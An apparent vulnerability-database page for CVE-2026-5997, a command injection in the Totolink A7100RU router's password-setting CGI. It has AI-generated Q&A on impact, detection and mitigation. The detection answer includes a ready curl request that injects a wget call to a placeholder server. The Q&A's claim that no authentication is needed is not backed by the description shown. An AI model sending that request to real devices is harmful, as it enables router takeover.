CVE-2026-5997
Received Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler (Remote

Publication date: 2026-04-10

Last updated on: 2026-04-10

Assigner: VulDB

Description
A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-10
Last Modified
2026-04-10
Generated
2026-05-06
AI Q&A
2026-04-10
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-5997 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI script cstecgi.cgi, specifically in the function that handles the "admpass" parameter for setting the login password.

The vulnerability occurs because the "admpass" parameter is inserted into a buffer without proper sanitization and then executed as an operating system command. This allows an attacker to remotely send a crafted HTTP POST request with malicious input that gets executed on the router.

In practical terms, an attacker can inject arbitrary OS commands by manipulating the "admpass" argument, leading to full remote command execution on the device.


How can this vulnerability impact me? :

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication.

  • Complete compromise of the router device, including control over its configuration and operation.
  • Potential interception or manipulation of network traffic passing through the router.
  • Use of the compromised router as a foothold for further attacks within the network.
  • Deployment of malicious payloads or malware via the router.

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by sending a crafted HTTP POST request to the endpoint /cgi-bin/cstecgi.cgi on the affected Totolink A7100RU router. The request should include a JSON payload with the "admpass" parameter set to a command that, if executed, confirms the vulnerability.

For example, a proof of concept involves setting the "admpass" parameter to a command like `wget 192.168.6.1:7777/testpoc`. If the router executes this command, it indicates the presence of the vulnerability.

A detection command could be constructed using curl as follows:

  • curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -d '{"admpass":"wget http://[your_server]/testpoc"}' -H 'Content-Type: application/json'

Monitoring network traffic for unexpected outbound connections (such as wget requests) from the router to an attacker-controlled server can also help detect exploitation attempts.


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the router's management interface to trusted networks only, such as limiting access to the local network or specific IP addresses.

Disable remote management features if they are not required to reduce the attack surface.

Monitor network traffic for suspicious outbound connections that may indicate exploitation attempts.

Apply any available firmware updates or patches provided by the vendor that address this vulnerability.

If no patch is available, consider replacing the affected device or isolating it from critical network segments until a fix is applied.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router due to improper input handling in the password configuration functionality.

Such a vulnerability could lead to unauthorized access, data breaches, or manipulation of sensitive information, which may impact compliance with common standards and regulations like GDPR and HIPAA that require protection of personal and sensitive data.

However, the provided information does not explicitly describe the direct effects on compliance with these standards.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart